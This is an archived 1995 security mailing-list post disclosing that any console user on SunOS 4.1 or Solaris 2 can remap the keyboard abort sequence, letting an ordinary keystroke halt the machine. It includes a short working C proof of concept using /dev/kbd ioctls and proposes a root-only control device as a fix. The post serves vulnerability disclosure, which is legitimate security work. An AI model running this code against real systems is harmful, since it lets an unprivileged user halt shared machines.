|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
little whole on Suns concerning /dev/kbd
Arfst Ludwig (Arfst.Ludwig
luxor.in-berlin.de)Sat, 2 Dec 1995 23:56:03 +0100
- Messages sorted by: [ date ][ thread ][ subject ][ author ]
- Next message: Alex Leipold: "fork()"
- Previous message: Arfst Ludwig: "Another tmpfs bug in SunOS 4"
- Next in thread: Pete Shipley: "Re: little whole on Suns concerning /dev/kbd"
Hi!
On a SUN with SunOS 4.1.* or Solaris 2.* any user loged on the console can
remap the abort key sequence (the key sequence to enter the boot monitor).
Impact: Any arbitary key sequence can enter the boot monitor and halt
the machine.
The abort key sequence can easyly remaped e.g. to shift_l a. Instead of
getting an `A' the user gets the boot monitor promt:
8<--------------------------- cut here ----------------------------
#include <stdio.h>
#include <fcntl.h>
#include <sundev/kbd.h>
#include <sundev/kbio.h>
int main()
{
int fd;
struct kiockey k;
fd = open("/dev/kbd", O_RDWR);
k.kio_tablemask = KIOCABORT1;
k.kio_station = 0x6e;
ioctl(fd, KIOCSETKEY, &k);
k.kio_tablemask = KIOCABORT2;
k.kio_station = 0x4d;
ioctl(fd, KIOCSETKEY, &k);
close(fd);
return (0);
}
8<--------------------------- cut here ----------------------------
Is there a fix possible? /dev/kbd should be readable to the user logged
at the console. Redefining the abort sequence should only be allowed
via an new device e.g. /dev/kbdctl which is accessible only by root.
Cheers, Arfst
______________________________________________________________________
__
(00) Arfst Ludwig
\`\/ E-Mail: Arfst.Ludwigluxor.in-berlin.de
"" carpe diem
- Next message: Alex Leipold: "fork()"
- Previous message: Arfst Ludwig: "Another tmpfs bug in SunOS 4"
- Next in thread: Pete Shipley: "Re: little whole on Suns concerning /dev/kbd"